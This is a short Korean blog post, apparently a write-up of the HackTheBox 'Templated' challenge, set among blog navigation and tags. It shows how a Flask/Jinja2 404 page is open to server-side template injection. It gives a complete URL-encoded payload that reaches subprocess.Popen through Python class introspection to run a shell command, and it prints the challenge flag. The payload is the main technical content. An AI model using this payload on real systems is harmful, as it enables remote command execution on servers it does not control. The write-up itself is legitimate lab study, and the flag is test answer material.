Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- cce2023
- PS
- 예전글
- web
- regex
- 예전글 #PS
- SQLi
- 예전글 #CNN
- blind-sqli
- SECGAME
- HTB
- pwn
- blind_sqli
- pwnable
- Bob
- cookie
- Crypto
- JS
- pwn.college
- Pwnable.kr
- cryptohack.org
- webhacking.kr
- 백준
- XSS
Archives
- Today
- Total
아모에요
[HackTheBox] Templated 본문
간단한 SSTI로 풀리는 문제이다.
주어진 사이트에 접속하자마자 flask/jinja2로 개발되었다고 대놓고 SSTI 냄새를 풍긴다. 문제 이름도 templated이다.
아무 문자나 쳐서 사이트에 접속하면
Error 404사이트가 뜨면서 page '입력한 문자열'이 발견되지 않았다고 나온다.
{{1+1}}을 대입하면 The page '2' could not be found가 나오면서 SSTI가 터진다.
아무런 보안기법도 걸려있지 않으므로 ''.__class__.__mro__[1].__subclasses__()에서 subprocess.Popen을 실행시켜주면 된다.
/%7B%7B''.__class__.__mro__[1].__subclasses__()[414]('cat%20flag.txt',shell=True,stdout=-1).communicate()%7D%7D
HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!}
'Study > Hacking' 카테고리의 다른 글
[dreamhack.io] phpythonode (0) | 2023.07.13 |
---|---|
[dreamhack.io] node_api (0) | 2023.07.13 |
[pwn.college] Talking Web - level1 (0) | 2023.07.13 |
[BoB] ipTIME A3004NS-M 펌웨어 버전 11.99.2 분석 (0) | 2023.07.11 |
[cryptohack.org] Introduction (0) | 2023.07.11 |